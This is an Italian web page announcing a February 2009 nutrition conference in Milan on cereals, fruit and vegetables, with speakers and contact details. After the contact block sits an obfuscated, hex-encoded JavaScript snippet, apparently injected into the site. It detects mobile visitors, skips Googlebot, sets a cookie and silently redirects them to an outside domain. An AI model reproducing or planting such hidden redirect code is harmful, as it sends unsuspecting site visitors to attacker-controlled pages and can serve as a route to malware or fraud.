Cereali, frutta e verdura: fonti primarie di energia per l’uomo

Il secondo appuntamento per il 2009 della manifestazione “Sapere. Il Sapore del Sapere ideata da Rossella De Focatiis e organizzata da Erredieffe, si terrà il 13 febbraio 2009 presso Palazzo Turati, sede della Camera di Commercio di Milano, in via Meravigli 9/b Milano dalle ore 14.00 alle ore 18.30 e verterà sul tema “Cereali, frutta e verdure: fonti primarie di energia per l’uomo”.
In una sana e corretta dieta alimentare non dovrebbero mai mancare alimenti quali cereali, frutta e verdura.
I cereali, piante presenti da secoli nell’alimentazione umana aventi un’importanza primaria nella nutrizione di moltissimi popoli, sono colonne portanti di un’alimentazione corretta, la “base” della piramide alimentare prevista dalla dieta mediterranea.
Impiegati direttamente oppure utilizzati per la produzione di farine e di bevande alcoliche, sono ricchi di amidi e si caratterizzano per un’altissima digeribilità e facilità di conservazione.
Oggi si ritiene che l’apporto nutritivo derivante dai cereali debba costituire il contributo principale, pari addirittura al 60% del totale, di una sana e corretta alimentazione.
Oltre a fornire la maggior parte della propria energia nutritiva sotto forma di amido (dal 54% al 87,6% a seconda del cereale), sono anche importanti fonti di fibra, tratto essenziale soprattutto dei cereali integrali, proteine, tra cui ricordiamo il glutine, e  vitamine, in particolare quelle del gruppo B tra cui vitamina (vit. B1) e niancina (vit.PP).
Presentano invece un bassissimo contenuto di grassi e di acqua.
La frutta e la verdura dal canto loro ci nutrono soddisfacendo esigenze primarie del nostro organismo, esercitando un effetto positivo riducendo il rischio di vari tipi di disturbi e contribuiscono a riparare i danni che possono derivare da cattive abitudini alimentari.
La frutta  contiene moltissimi carboidrati e ci offre una grande quantità di acqua, vitamine (vitamina C in particolare) e antiossidanti, sostanze fondamentali per difendere il nostro organismo dai radicali liberi.
La verdura, che non dovrebbe mai mancare sulla nostra tavola, nonostante l’apporto modesto al raggiungimento della quota energetica giornaliera, ha un elevato potere saziante.
Caratteristiche fondamentali di tale alimento sono essenzialmente l’elevato contenuto di acqua (dal 75% al 95%) e l’eccezionale  apporto vitaminico-minerale (vitamina C, vitamina A, calcio, ferro e oligoelementi essenziali per citare solo alcuni esempi).
L’importante contributo di Fibra (cellulose, emicellulose, pectine) ha il grande compito di favorire il transito intestinale, contribuendo a prevenire l’insorgenza di malattie più o meno gravi dell’apparato gastro-intestinale.
Parteciperanno al convegno in qualità di relatori il dott. Massimo Artorige Giubilesi, Presidente di Giubilesi & Associati, Lead Auditor Sistemi ISO9001, 14001, 22000, Vice Presidente Ordine dei Tecnologi Alimentari e Delegato per le Attività di Formazione e Aggiornamento Professionale, che si occuperà di “Acquisto, conservazione, consumo di prodotti vegetali per garantire gusto e salute” e Gianbattista Rossi, Coordinatore Gruppo Locale Civiltà Contadina di Bergamo, che parlerà di “Cereali e frutti antichi ritrovati: le esperienze di Civiltà Contadina”.
L’intervento del dott. Franco Berrino, Direttore del Dipartimento di Medicina Preventiva e Predittiva dell’Istituto Nazionale dei Tumori di Milano, verterà sull’ “Alimentazione per la prevenzione dei tumori al seno” .
Saranno inoltre presenti il dott. Vanni Zacchi, medico specialista in Ginecologia e Ostetricia, esperto in nutrizione, agopuntura, omeopatia e medicine Energetiche che parlerà de “I carboidrati e il loro impatto metabolico” e Giuliana Lomazzi giornalista, esperta in alimentazione e gastronomia ed autrice di diversi libri che ci illustrerà “Le meraviglie del piatto unico”.

Si ringrazia per la collaborazione AGRIMERCATI, Azienda della Camera di Commercio di Milano e delle Associazioni di rappresentanza per lo sviluppo delle filiere agricola e agroalimentare.
La prenotazione è obbligatoria e la partecipazione gratuita.

Location: Palazzo Turati
Via Meravigli 9/b Milano
Data: 13 febbraio 2009
Orario: dalle h 14.00 alle h 18.30

Per informazioni:
ERREDIEFFE
02- 66115408 – 02 66114397
info@saporedelsapere.it
www.saporedelsapere.it
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Redazione naturopatia online

naturopatiaonline|magazine Redazione

Redazione naturopatia online ha 58 articoli e più. Guarda tutti gli articoli di Redazione naturopatia online

Redazione naturopatia online
EnglishItalian